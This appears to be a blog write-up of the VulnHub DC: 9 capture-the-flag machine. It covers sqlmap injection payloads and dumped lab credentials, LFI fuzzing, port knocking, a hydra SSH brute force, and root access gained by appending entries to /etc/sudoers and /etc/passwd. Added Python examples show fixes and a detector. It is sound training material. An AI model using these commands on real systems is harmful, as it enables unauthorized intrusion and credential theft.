[Information Security] VulnHub – DC: 9 Write-up

DC: 9, the ninth challenge in the DC series, was finally fully solved in the second week after the Lunar New Year holiday. That is two weeks later than I had planned, but at least I kept the promise I made back then. When time allows I will probably keep looking for boot2root machines to practise on, and if my confidence holds up I should also find time to attempt the OSCP.

Environment Setup

VirtualBox: Kali & DC: 9
Net Config: NAT Network

Finding the Target

$ nmap 10.0.2.1/24 -sP                                                            
Starting Nmap 7.91 ( https://nmap.org ) at 2021-02-20 10:09 CST
Nmap scan report for 10.0.2.1
Host is up (0.013s latency).
Nmap scan report for 10.0.2.2
Host is up (0.0052s latency).
Nmap scan report for 10.0.2.15
Host is up (0.00025s latency).
Nmap scan report for 10.0.2.20
Host is up (0.0021s latency).
Nmap done: 256 IP addresses (4 hosts up) scanned in 13.71 seconds

$ nmap 10.0.2.20 -p- -A
Starting Nmap 7.91 ( https://nmap.org ) at 2021-02-20 10:51 CST
Nmap scan report for 10.0.2.20
Host is up (0.0011s latency).
Not shown: 65534 closed ports
PORT   STATE SERVICE VERSION
80/tcp open  http    Apache httpd 2.4.38 ((Debian))
|_http-server-header: Apache/2.4.38 (Debian)
|_http-title: Example.com - Staff Details - Welcome

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 26.21 seconds

Solution

Since only port 80 was open, I browsed to it and found a simple website.

Wappalyzer

Wappalyzer did not reveal anything useful.

SQL Injection

I found a SQL injection point through the Search function.

SQLMAP

The UserDetails table in the users database contains many account credentials, and the passwords are stored unencrypted, in plaintext.

$ sqlmap -r dc9_payload.txt --dbs -D users -T UserDetails --dump   
        ___
       __H__ 
 ___ ___[)]_____ ___ ___  {1.4.11#stable} 
|_ -| . ["]     | .'| . |
|___|_  [(]_|_|_|__,|  _|
      |_|V...       |_|   http://sqlmap.org

[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program

[*] starting @ 10:57:24 /2021-02-20/

[10:57:24] [INFO] parsing HTTP request from 'dc9_payload.txt'
custom injection marker ('*') found in POST body. Do you want to process it? [Y/n/q] 
[10:57:25] [INFO] resuming back-end DBMS 'mysql' 
[10:57:25] [INFO] testing connection to the target URL
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: #1* ((custom) POST)
    Type: time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
    Payload: search=' AND (SELECT 3088 FROM (SELECT(SLEEP(5)))pxVA) AND 'capG'='capG

    Type: UNION query
    Title: Generic UNION query (NULL) - 6 columns
    Payload: search=' UNION ALL SELECT NULL,CONCAT(0x7176626a71,0x6a6d6f4f554e42795855646c72447963637579574e4754724a736d6b4d5a5377684c70664752586f,0x716a786a71),NULL,NULL,NULL,NULL-- -
---
[10:57:25] [INFO] the back-end DBMS is MySQL
back-end DBMS: MySQL >= 5.0.12 (MariaDB fork)
[10:57:25] [INFO] fetching database names
available databases [3]:
[*] information_schema
[*] Staff
[*] users

[10:57:26] [INFO] fetching columns for table 'UserDetails' in database 'users'
[10:57:26] [INFO] fetching entries for table 'UserDetails' in database 'users'
Database: users
Table: UserDetails
[17 entries]
+----+------------+---------------+---------------------+-----------+-----------+
| id | lastname   | password      | reg_date            | username  | firstname |
+----+------------+---------------+---------------------+-----------+-----------+
| 1  | Moe        | 3kfs86sfd     | 2019-12-29 16:58:26 | marym     | Mary      |
| 2  | Dooley     | 468sfdfsd2    | 2019-12-29 16:58:26 | julied    | Julie     |
| 3  | Flintstone | 4sfd87sfd1    | 2019-12-29 16:58:26 | fredf     | Fred      |
| 4  | Rubble     | RocksOff      | 2019-12-29 16:58:26 | barneyr   | Barney    |
| 5  | Cat        | TC&TheBoyz    | 2019-12-29 16:58:26 | tomc      | Tom       |
| 6  | Mouse      | B8m#48sd      | 2019-12-29 16:58:26 | jerrym    | Jerry     |
| 7  | Flintstone | Pebbles       | 2019-12-29 16:58:26 | wilmaf    | Wilma     |
| 8  | Rubble     | BamBam01      | 2019-12-29 16:58:26 | bettyr    | Betty     |
| 9  | Bing       | UrAG0D!       | 2019-12-29 16:58:26 | chandlerb | Chandler  |
| 10 | Tribbiani  | Passw0rd      | 2019-12-29 16:58:26 | joeyt     | Joey      |
| 11 | Green      | yN72#dsd      | 2019-12-29 16:58:26 | rachelg   | Rachel    |
| 12 | Geller     | ILoveRachel   | 2019-12-29 16:58:26 | rossg     | Ross      |
| 13 | Geller     | 3248dsds7s    | 2019-12-29 16:58:26 | monicag   | Monica    |
| 14 | Buffay     | smellycats    | 2019-12-29 16:58:26 | phoebeb   | Phoebe    |
| 15 | McScoots   | YR3BVxxxw87   | 2019-12-29 16:58:26 | scoots    | Scooter   |
| 16 | Trump      | Ilovepeepee   | 2019-12-29 16:58:26 | janitor   | Donald    |
| 17 | Morrison   | Hawaii-Five-0 | 2019-12-29 16:58:28 | janitor2  | Scott     |
+----+------------+---------------+---------------------+-----------+-----------+
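To show why the search box is injectable and what the fix looks like, here is an added Python example (not code from DC: 9, whose PHP source is not shown on this page): a constructed SQLite copy of the two tables, the string-concatenated query beside a parameterised one, and a six-column UNION of the shape sqlmap reported. The column names of the Staff search table are assumed.

```python
import sqlite3

# Constructed fixture: a copy of the two tables the dump above revealed.  The
# StaffDetails columns are assumed; UserDetails mirrors the real dump.
def build_db():
    con = sqlite3.connect(":memory:")
    con.executescript("""
        CREATE TABLE StaffDetails(id INTEGER, firstname TEXT, lastname TEXT,
                                  position TEXT, phone TEXT, email TEXT);
        CREATE TABLE UserDetails(id INTEGER, lastname TEXT, password TEXT,
                                 reg_date TEXT, username TEXT, firstname TEXT);
        INSERT INTO StaffDetails VALUES(1,'Mary','Moe','CEO','0123456','marym@example.com');
        INSERT INTO UserDetails VALUES(1,'Moe','3kfs86sfd','2019-12-29 16:58:26','marym','Mary');
        INSERT INTO UserDetails VALUES(9,'Bing','UrAG0D!','2019-12-29 16:58:26','chandlerb','Chandler');
    """)
    return con

def search_vulnerable(con, term):
    # The search term is pasted into the SQL text, so a quote in it ends the
    # string literal and whatever follows is executed as SQL.
    sql = ("SELECT id, firstname, lastname, position, phone, email "
           "FROM StaffDetails WHERE lastname LIKE '%" + term + "%'")
    return con.execute(sql).fetchall()

def search_safe(con, term):
    # Bound parameter: the driver passes the term as a value, never as SQL,
    # so the same input can only ever be compared against lastname.
    sql = ("SELECT id, firstname, lastname, position, phone, email "
           "FROM StaffDetails WHERE lastname LIKE ?")
    return con.execute(sql, ("%" + term + "%",)).fetchall()

# A six-column UNION of the shape sqlmap reported, which pulls rows from the
# other table into the search result.
UNION_TERM = "' UNION ALL SELECT NULL,username,password,NULL,NULL,NULL FROM UserDetails-- -"

def leaked_credentials(rows):
    """(username, password) pairs that rode in on the NULL-id UNION rows."""
    return sorted((r[1], r[2]) for r in rows if r[0] is None)
```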

Next I looked at the Users table in the Staff database and found an admin account together with its password hash.

$ sqlmap -r dc9_payload.txt --dbs -D Staff -T Users --dump   
        ___
       __H__                                  
 ___ ___[.]_____ ___ ___  {1.4.11#stable}
|_ -| . [)]     | .'| . |
|___|_  ["]_|_|_|__,|  _|
      |_|V...       |_|   http://sqlmap.org 
[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program

[*] starting @ 13:33:40 /2021-02-21/

[13:33:40] [INFO] parsing HTTP request from 'dc9_payload.txt'
custom injection marker ('*') found in POST body. Do you want to process it? [Y/n/q] 
[13:33:42] [INFO] resuming back-end DBMS 'mysql' 
[13:33:42] [INFO] testing connection to the target URL
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: #1* ((custom) POST)
    Type: time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
    Payload: search=' AND (SELECT 3088 FROM (SELECT(SLEEP(5)))pxVA) AND 'capG'='capG

    Type: UNION query
    Title: Generic UNION query (NULL) - 6 columns
    Payload: search=' UNION ALL SELECT NULL,CONCAT(0x7176626a71,0x6a6d6f4f554e42795855646c72447963637579574e4754724a736d6b4d5a5377684c70664752586f,0x716a786a71),NULL,NULL,NULL,NULL-- -
---
[13:33:42] [INFO] the back-end DBMS is MySQL
back-end DBMS: MySQL >= 5.0.12 (MariaDB fork)
[13:33:42] [INFO] fetching database names
available databases [3]:
[*] information_schema
[*] Staff
[*] users

[13:33:42] [INFO] fetching columns for table 'Users' in database 'Staff'
[13:33:42] [INFO] fetching entries for table 'Users' in database 'Staff'
[13:33:42] [INFO] recognized possible password hashes in column 'Password'
do you want to store hashes to a temporary file for eventual further processing with other tools [y/N] 
do you want to crack them via a dictionary-based attack? [Y/n/q] 
[13:33:43] [INFO] using hash method 'md5_generic_passwd'
what dictionary do you want to use?
[1] default dictionary file '/usr/share/sqlmap/data/txt/wordlist.tx_' (press Enter)
[2] custom dictionary file
[3] file with list of dictionary files
> 
[13:33:44] [INFO] using default dictionary
do you want to use common password suffixes? (slow!) [y/N] 
[13:33:45] [INFO] starting dictionary-based cracking (md5_generic_passwd)
[13:33:45] [INFO] starting 2 processes 
[13:34:47] [WARNING] no clear password(s) found                        
Database: Staff
Table: Users
[1 entry]
+--------+----------------------------------+----------+
| UserID | Password                         | Username |
+--------+----------------------------------+----------+
| 1      | 856f5de590ef37314e7c3bdf6f8a66dc | admin    |
+--------+----------------------------------+----------+

[13:34:47] [INFO] table 'Staff.Users' dumped to CSV file '/home/mksyi/.local/share/sqlmap/output/10.0.2.20/dump/Staff/Users.csv'
[13:34:47] [INFO] fetched data logged to text files under '/home/mksyi/.local/share/sqlmap/output/10.0.2.20'

Login

I first tried logging in with the credentials from the users database; after a few attempts none of them worked, so I switched to the Staff table. That password was hashed, but the online tool crackstation recovered it as transorbital1.
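The admin hash fell to a lookup table because it is a bare MD5 of the password, with no salt and no work factor. As an added example (not code from the page), this Python checks exactly that against the dumped hash and shows the salted, iterated PBKDF2 storage that would have resisted crackstation.

```python
import hashlib
import hmac
import os

# The admin hash dumped from Staff.Users above; sqlmap labelled it
# md5_generic_passwd and crackstation returned transorbital1.
ADMIN_HASH = "856f5de590ef37314e7c3bdf6f8a66dc"

def is_unsalted_md5(stored_hex, candidate):
    """True when stored_hex is just md5(candidate): no salt and no work factor,
    which is why a precomputed lookup table answers it instantly."""
    digest = hashlib.md5(candidate.encode()).hexdigest()
    return hmac.compare_digest(digest, stored_hex.lower())

def hash_password(password, iterations=600_000):
    """Salted PBKDF2-HMAC-SHA256; a fresh 16-byte salt per user defeats shared
    lookup tables, and the iteration count makes each guess cost real CPU time."""
    salt = os.urandom(16)
    dk = hashlib.pbkdf2_hmac("sha256", password.encode(), salt, iterations)
    return f"pbkdf2_sha256${iterations}${salt.hex()}${dk.hex()}"

def verify_password(password, stored):
    """Recompute with the stored salt and iteration count; constant-time compare."""
    algo, iterations, salt_hex, dk_hex = stored.split("$")
    if algo != "pbkdf2_sha256":
        return False
    dk = hashlib.pbkdf2_hmac("sha256", password.encode(), bytes.fromhex(salt_hex), int(iterations))
    return hmac.compare_digest(dk.hex(), dk_hex)
```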

After logging in successfully as admin/transorbital1, I noticed the text "File does not exist" at the bottom of the page. Much like the footer in DC: 5, this looked like a file parameter that could be abused for LFI.

LFI was possible, but there was nowhere to write a file and no phpinfo to leverage, so I did not know how to get RCE. In the end I brute-forced paths with Burp.

wfuzz -c -z file,linux_list.txt --hw 78 -u http://10.0.2.20/welcome.php?file=../../../../../../..FUZZ -b PHPSESSID=9grc9ljpq4n37bvr0n012p37in

That still did not yield anything useful. I struggled here for several days and finally decided to peek at other people's write-ups: others had found the file /etc/knockd.conf, and that was my first introduction to the concept of Single Packet Authorization (SPA).

First use the firewall to block all ports by default (or at least the important ones, such as 22). This is like building, outside the door lock, another door with no lock and no keyhole. Then agree with the client to knock on a few ports in a specific order (for example first 23815, then 62408, then 59174). When the server detects that specific sequence, the outer door opens briefly for a minute or two, like "open sesame", and only then does the keyhole (port 22, ssh) become visible.

(Quoted from the article "Hiding even the keyhole: a complete SSH defence with SPA")

Looking at the /etc/knockd.conf configuration file, the condition for opening ssh is the knock sequence 7469, 8475, 9842.

There was still one problem: even if I could reach ssh, I had no credentials. So I thought of the plaintext username/password pairs taken from the database earlier.

marym/3kfs86sfd
julied/468sfdfsd2
fredf/4sfd87sfd1
barneyr/RocksOff
tomc/TC&TheBoyz
jerrym/B8m#48sd
wilmaf/Pebbles
bettyr/BamBam01
chandlerb/UrAG0D!
joeyt/Passw0rd
rachelg/yN72#dsd
rossg/ILoveRachel
monicag/3248dsds7s
phoebeb/smellycats
scoots/YR3BVxxxw87
janitor/Ilovepeepee
janitor2/Hawaii-Five-0

After saving them as dc9_user.txt and dc9_pass.txt, I brute-forced with hydra, remembering to knock on the target in the configured order first.

$ for x in 7469 8475 9842; do nmap -Pn --max-retries 0 -p $x 10.0.2.20; done
$ hydra -L dc9_user.txt -P dc9_pass.txt ssh://10.0.2.20 

The brute force yielded three valid credential pairs.

[22][ssh] host: 10.0.2.20   login: chandlerb   password: UrAG0D!
[22][ssh] host: 10.0.2.20   login: joeyt   password: Passw0rd
[22][ssh] host: 10.0.2.20   login: janitor   password: Ilovepeepee
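From the defender's side the hydra run above is textbook password spraying: one source, many usernames, a few seconds apart. As an added example (not from the page), this Python detector parses constructed sshd auth.log lines modelled on that run and flags sources that try several distinct accounts within a short window, along with any that eventually succeeded.

```python
import re
from collections import defaultdict
from datetime import datetime

# Constructed sshd lines in Debian auth.log format, modelled on the hydra run
# above: one source cycling through the dumped usernames, then a normal login.
SAMPLE_LOG = """\
Feb 21 14:02:11 dc-9 sshd[1201]: Failed password for invalid user marym from 10.0.2.15 port 40122 ssh2
Feb 21 14:02:11 dc-9 sshd[1203]: Failed password for invalid user julied from 10.0.2.15 port 40124 ssh2
Feb 21 14:02:12 dc-9 sshd[1205]: Failed password for invalid user barneyr from 10.0.2.15 port 40126 ssh2
Feb 21 14:02:12 dc-9 sshd[1207]: Failed password for tomc from 10.0.2.15 port 40128 ssh2
Feb 21 14:02:13 dc-9 sshd[1209]: Accepted password for chandlerb from 10.0.2.15 port 40130 ssh2
Feb 21 14:02:13 dc-9 sshd[1211]: Accepted password for joeyt from 10.0.2.15 port 40132 ssh2
Feb 21 14:09:40 dc-9 sshd[1300]: Failed password for fredf from 10.0.2.2 port 51000 ssh2
Feb 21 14:09:42 dc-9 sshd[1302]: Accepted password for fredf from 10.0.2.2 port 51002 ssh2
"""

LINE_RE = re.compile(
    r"^(?P<ts>\w{3} +\d+ \d\d:\d\d:\d\d) \S+ sshd\[\d+\]: "
    r"(?P<result>Accepted|Failed) password for (?:invalid user )?(?P<user>\S+) "
    r"from (?P<ip>\d+\.\d+\.\d+\.\d+) port \d+ ssh2$")

def spray_sources(log, min_users=3, window_s=60, year=2021):
    """Map each source IP that tried at least min_users distinct accounts within
    window_s seconds to the usernames it tried and those that were Accepted."""
    events = defaultdict(list)  # ip -> [(time, user, result)]
    for line in log.splitlines():
        m = LINE_RE.match(line)
        if m:  # syslog timestamps carry no year, so one is supplied
            ts = datetime.strptime(f"{year} {m['ts']}", "%Y %b %d %H:%M:%S")
            events[m["ip"]].append((ts, m["user"], m["result"]))
    findings = {}
    for ip, evs in events.items():
        evs.sort()
        for i, (start, _, _) in enumerate(evs):  # slide a window over each start
            window = [e for e in evs[i:] if (e[0] - start).total_seconds() <= window_s]
            users = {u for _, u, _ in window}
            if len(users) >= min_users:
                findings[ip] = {"users": sorted(users),
                                "succeeded": sorted({u for _, u, r in window if r == "Accepted"})}
                break
    return findings
```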

Get Root to Win

Now I could log in over SSH. A quick look around showed that none of the three users were in sudoers and there was no gcc, but under the home directory of janitor I found the file passwords-found-on-post-it-notes.txt.

$ ssh janitor@10.0.2.20
$ cat /home/janitor/.secrets-for-putin/passwords-found-on-post-it-notes.txt

After adding its contents to the password list and running the brute force again, one more account came out.

[22][ssh] host: 10.0.2.20   login: fredf   password: B4-Tru3-001

I logged in as fredf and tried to gather more information.

ssh fredf@10.0.2.20
fredf@dc-9:~$ sudo -l
Matching Defaults entries for fredf on dc-9:
    env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin

User fredf may run the following commands on dc-9:
    (root) NOPASSWD: /opt/devstuff/dist/test/test

So fredf can run the test program as root via sudo, without a password.

fredf@dc-9:/opt/devstuff/dist/test$ /opt/devstuff/dist/test/test
Usage: python test.py read append

Judging from the usage text, it probably reads the contents of the read file and appends them to the end of the append file; experimenting with it confirmed exactly that.

This can be used to add a user or rewrite files: for example, appending an entry to sudoers, or adding a root-equivalent user directly through /etc/passwd.

Modifying sudoers:

echo -en "fredf ALL=(ALL:ALL) ALL" > payload.txt
sudo /opt/devstuff/dist/test/test payload.txt /etc/sudoers

Adding a user:

$ openssl passwd -1 -salt hacker 123456
$1$hacker$6luIRwdGpBvXdP.GMwcZp/

# single quotes: in double quotes the shell would expand $1 and $hacker and corrupt the hash
echo -en 'mksyi:$1$hacker$6luIRwdGpBvXdP.GMwcZp/:0:0::/root:/bin/bash' > payload.txt
sudo /opt/devstuff/dist/test/test payload.txt /etc/passwd
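The root cause on the privilege-escalation side is a root-run helper that appends to whatever path its caller names. As an added example (hypothetical code, not the DC: 9 test program), this Python version confines the destination to one allowed directory and opens it with O_NOFOLLOW; demo() replays the sudoers payload from above against a constructed fake passwd file in a temporary directory.

```python
import os
import tempfile
from pathlib import Path

# Hypothetical hardened replacement for a root-run "read src, append to dst"
# helper (added example, not the DC: 9 program).  The destination must resolve
# inside one fixed directory, so a sudo NOPASSWD rule on this helper no longer
# lets the caller append to /etc/passwd or /etc/sudoers.
MAX_BYTES = 1 << 20  # refuse oversized source files

def safe_append(src: str, dst: str, allowed_dir: str) -> int:
    """Append src to dst; dst must live under allowed_dir. Returns bytes written."""
    allowed = Path(allowed_dir).resolve(strict=True)
    raw = Path(dst)
    if raw.is_symlink():
        raise PermissionError("destination must not be a symlink")
    target = raw.resolve()  # also resolves symlinks and '..' in the parent path
    if allowed not in target.parents:
        raise PermissionError(f"{dst} resolves outside {allowed}")
    with open(src, "rb") as f:
        data = f.read(MAX_BYTES + 1)
    if len(data) > MAX_BYTES:
        raise ValueError("source file too large")
    # O_NOFOLLOW closes the race between the symlink check and the open.
    fd = os.open(target, os.O_WRONLY | os.O_APPEND | os.O_CREAT | os.O_NOFOLLOW, 0o640)
    with os.fdopen(fd, "ab") as out:
        out.write(data)
    return len(data)

def demo() -> tuple:
    """Constructed scenario: the sudoers payload from above, an allowed log
    directory and a fake passwd file outside it. Returns (bytes_appended, blocked)."""
    with tempfile.TemporaryDirectory() as root:
        payload = Path(root, "payload.txt")
        payload.write_text("fredf ALL=(ALL:ALL) ALL\n")
        logs = Path(root, "logs")
        logs.mkdir()
        fake_passwd = Path(root, "etc", "passwd")
        fake_passwd.parent.mkdir()
        fake_passwd.write_text("root:x:0:0::/root:/bin/bash\n")
        n = safe_append(str(payload), str(logs / "notes.log"), str(logs))
        blocked = 0
        for dst in (fake_passwd, logs / ".." / "etc" / "passwd"):
            try:
                safe_append(str(payload), str(dst), str(logs))
            except PermissionError:
                blocked += 1
        untouched = fake_passwd.read_text() == "root:x:0:0::/root:/bin/bash\n"
        return n, blocked == 2 and untouched
```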

Get Root

sudo su
[sudo] password for fredf: 
root@dc-9:/tmp# 
root@dc-9:~# cat theflag.txt


███╗   ██╗██╗ ██████╗███████╗    ██╗    ██╗ ██████╗ ██████╗ ██╗  ██╗██╗██╗██╗
████╗  ██║██║██╔════╝██╔════╝    ██║    ██║██╔═══██╗██╔══██╗██║ ██╔╝██║██║██║
██╔██╗ ██║██║██║     █████╗      ██║ █╗ ██║██║   ██║██████╔╝█████╔╝ ██║██║██║
██║╚██╗██║██║██║     ██╔══╝      ██║███╗██║██║   ██║██╔══██╗██╔═██╗ ╚═╝╚═╝╚═╝
██║ ╚████║██║╚██████╗███████╗    ╚███╔███╔╝╚██████╔╝██║  ██║██║  ██╗██╗██╗██╗
╚═╝  ╚═══╝╚═╝ ╚═════╝╚══════╝     ╚══╝╚══╝  ╚═════╝ ╚═╝  ╚═╝╚═╝  ╚═╝╚═╝╚═╝╚═╝

Congratulations - you have done well to get to this point.

Hope you enjoyed DC-9.  Just wanted to send out a big thanks to all those
who have taken the time to complete the various DC challenges.

I also want to send out a big thank you to the various members of @m0tl3ycr3w .

They are an inspirational bunch of fellows.

Sure, they might smell a bit, but...just kidding.  :-)

Sadly, all things must come to an end, and this will be the last ever
challenge in the DC series.

So long, and thanks for all the fish.

MksYi

A learner who shares knowledge through the Internet.
